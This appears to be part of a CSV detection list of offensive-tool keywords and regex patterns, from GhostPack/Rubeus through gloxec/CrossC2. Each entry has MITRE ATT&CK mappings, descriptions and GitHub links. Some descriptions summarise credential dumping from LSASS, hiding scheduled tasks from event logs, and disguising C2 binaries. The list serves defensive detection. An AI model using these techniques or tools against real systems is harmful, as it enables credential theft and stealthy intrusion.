"*GhostPack/Rubeus*",".{0,1000}GhostPack\/Rubeus.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*GhostPack/SafetyKatz*",".{0,1000}GhostPack\/SafetyKatz.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","10","10","1156","236","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z" "*GhostPack/Seatbelt*",".{0,1000}GhostPack\/Seatbelt.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","3485","648","2024-03-23T12:37:17Z","2018-07-24T17:38:51Z" "*GhostPack/SharpDPAPI*",".{0,1000}GhostPack\/SharpDPAPI.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "*GhostPack/SharpUp*",".{0,1000}GhostPack\/SharpUp.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","10","1134","232","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z" "*Ghostpack-CompiledBinaries*",".{0,1000}Ghostpack\-CompiledBinaries.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation Tools","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","10","1009","205","2022-11-08T02:58:06Z","2018-07-25T23:38:15Z" "*GhostTask.exe*",".{0,1000}GhostTask\.exe.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*GhostTask-1.0.zip*",".{0,1000}GhostTask\-1\.0\.zip.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor - making them invisible to all users. - Establishes scheduled tasks directly via the registry - bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. - BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","10","5","417","51","2023-10-24T05:57:07Z","2023-10-23T13:05:00Z" "*GhostWebShell.cs*",".{0,1000}GhostWebShell\.cs.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","3026","460","2023-10-17T12:27:23Z","2017-09-18T17:48:08Z" "*GILLES Lionel aka topotam (@topotam77)*",".{0,1000}GILLES\sLionel\saka\stopotam\s\(\@topotam77\).{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","0","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*gimmecredz*",".{0,1000}gimmecredz.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","2","167","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z" "*ginuerzh/gost*",".{0,1000}ginuerzh\/gost.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities () in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/ginuerzh/gost","1","1","N/A","N/A","10","15142","2402","2024-04-19T11:42:09Z","2015-03-20T09:45:08Z" "*Gioyik/getExploit*",".{0,1000}Gioyik\/getExploit.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Gioyik/getExploit","1","1","N/A","N/A","1","44","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z" "*git clone * /tmp/cheetah*",".{0,1000}git\sclone\s.{0,1000}\s\/tmp\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","10","7","618","153","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z" "*git log -p | scanrepo *",".{0,1000}git\slog\s\-p\s\|\sscanrepo\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*git reset eb88d07c43afe407094e7d609248d85a15e148ef --hard* rm -f sshd*",".{0,1000}git\sreset\seb88d07c43afe407094e7d609248d85a15e148ef\s\-\-hard.{0,1000}\srm\s\-f\ssshd.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*github*/COMHunter/*",".{0,1000}github.{0,1000}\/COMHunter\/.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*github*/DeathStar*",".{0,1000}github.{0,1000}\/DeathStar.{0,1000}","offensive_tool_keyword","DeathStar","DeathStar is a Python script that uses Empires RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.","T1078 - T1059 - T1047 - T1018 - T1069","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/byt3bl33d3r/DeathStar","1","0","N/A","N/A","10","1563","330","2024-01-23T10:24:34Z","2017-05-21T07:34:57Z" "*github*/dropper.git*",".{0,1000}github.{0,1000}\/dropper\.git.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*github*/MoveKit.git*",".{0,1000}github.{0,1000}\/MoveKit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","635","108","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z" "*github*/Mr-xn/*",".{0,1000}github.{0,1000}\/Mr\-xn\/.{0,1000}","offensive_tool_keyword","spring-core-rce","github user infosec hosting exploitation tools","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*github*/padre.git*",".{0,1000}github.{0,1000}\/padre\.git.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*github.com/*Reaper.exe*",".{0,1000}github\.com\/.{0,1000}Reaper\.exe.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","2","112","31","2024-03-01T14:36:32Z","2023-09-21T02:09:48Z" "*github.com/Arno0x*",".{0,1000}github\.com\/Arno0x.{0,1000}","offensive_tool_keyword","Github Username","Github username known for exploitation toos and scripts","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Arno0x","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/BishopFox*",".{0,1000}github\.com\/BishopFox.{0,1000}","offensive_tool_keyword","Github Username","Private professional services firm providing offensive security testing to the Fortune 500. serving exploitation tools on github","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/BishopFox","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/bishopfox/*",".{0,1000}github\.com\/bishopfox\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*github.com/dafthack*",".{0,1000}github\.com\/dafthack.{0,1000}","offensive_tool_keyword","Github Username","Github user hosting exploitation tools for pentest and redteam","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/dafthack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/g3tsyst3m*",".{0,1000}github\.com\/g3tsyst3m.{0,1000}","offensive_tool_keyword","elevationstation","github user hosting multiple exploitation tools","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*github.com/GoSecure*",".{0,1000}github\.com\/GoSecure.{0,1000}","offensive_tool_keyword","Github Username","github repo name containing multiple exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/GoSecure","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/k8gege*",".{0,1000}github\.com\/k8gege.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*github.com/MythicAgents/*",".{0,1000}github\.com\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*github.com/nccgroup*",".{0,1000}github\.com\/nccgroup.{0,1000}","offensive_tool_keyword","Github Username","github repo name hosting securty tools and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/nccgroup","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/postrequest/link*",".{0,1000}github\.com\/postrequest\/link.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*github.com/quickbreach*",".{0,1000}github\.com\/quickbreach.{0,1000}","offensive_tool_keyword","Github Username","An infosec security researcher & penetration tester. hosting offensive tools","N/A","N/A","N/A","N/A","Sniffing & Spoofing","https://github.com/quickbreach","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/rasta-mouse/*",".{0,1000}github\.com\/rasta\-mouse\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","750","141","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*github.com/rossja/TinyNuke*",".{0,1000}github\.com\/rossja\/TinyNuke.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","10","4","395","120","2022-02-14T02:31:56Z","2021-09-03T17:34:44Z" "*github.com/SafeJKA/Kidlogger*",".{0,1000}github\.com\/SafeJKA\/Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*github.com/sensepost*",".{0,1000}github\.com\/sensepost.{0,1000}","offensive_tool_keyword","Github Username","github repo of orange cyberdefense red team","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/sensepost","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*github.com/SpiderLabs/*",".{0,1000}github\.com\/SpiderLabs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","10","10","290","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z" "*github.io/weakpass/generator/*",".{0,1000}github\.io\/weakpass\/generator\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*GithubC2-main*",".{0,1000}GithubC2\-main.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","10","10","122","34","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z" "*gitleaks detect*",".{0,1000}gitleaks\sdetect.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*gitleaks*",".{0,1000}gitleaks.{0,1000}","offensive_tool_keyword","Gitleaks","Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. in your code.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/zricethezav/gitleaks","1","1","N/A","N/A","10","15280","1313","2024-04-29T18:46:16Z","2018-01-27T18:19:31Z" "*Git-Scanner*",".{0,1000}Git\-Scanner.{0,1000}","offensive_tool_keyword","Git-Scanner","A tool for bug hunting or pentesting for targeting websites that have open .git repositories available in public","T1213 - T1596 - T1190 - T1590","TA0007 - TA0009 - TA0001","N/A","N/A","Information Gathering","https://github.com/HightechSec/git-scanner","1","1","N/A","N/A","4","332","89","2020-06-23T05:44:26Z","2020-05-17T14:30:19Z" "*GIUDA* -askluids*",".{0,1000}GIUDA.{0,1000}\s\-askluids.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*GIUDA-main.zip*",".{0,1000}GIUDA\-main\.zip.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","1","N/A","9","5","450","65","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*give_dcsync.py*",".{0,1000}give_dcsync\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*glassfish_war_upload_xsrf*",".{0,1000}glassfish_war_upload_xsrf.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*glebarez/padre*",".{0,1000}glebarez\/padre.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/glebarez/padre","1","1","N/A","8","3","203","20","2024-03-01T14:11:46Z","2019-12-30T13:52:03Z" "*glit org -*",".{0,1000}glit\sorg\s\-.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit repo *",".{0,1000}glit\srepo\s.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit user *",".{0,1000}glit\suser\s.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit.exe org*",".{0,1000}glit\.exe\sorg.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit.exe repo*",".{0,1000}glit\.exe\srepo.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit.exe user*",".{0,1000}glit\.exe\suser.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","0","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit-i686-pc-windows-msvc*",".{0,1000}glit\-i686\-pc\-windows\-msvc.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit-main.zip*",".{0,1000}glit\-main\.zip.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit-x86_64-apple-darwin*",".{0,1000}glit\-x86_64\-apple\-darwin.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit-x86_64-pc-windows-msvc*",".{0,1000}glit\-x86_64\-pc\-windows\-msvc.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*glit-x86_64-unknown-linux-gnu*",".{0,1000}glit\-x86_64\-unknown\-linux\-gnu.{0,1000}","offensive_tool_keyword","glit","Retrieve all mails of users related to a git repository a git user or a git organization","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/glit","1","1","N/A","8","1","41","6","2024-05-01T15:07:51Z","2022-11-14T11:25:10Z" "*globaleaks/Tor2web*",".{0,1000}globaleaks\/Tor2web.{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","1","N/A","9","7","684","175","2023-02-07T21:52:31Z","2011-12-17T15:14:02Z" "*gloxec/CrossC2*",".{0,1000}gloxec\/CrossC2.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 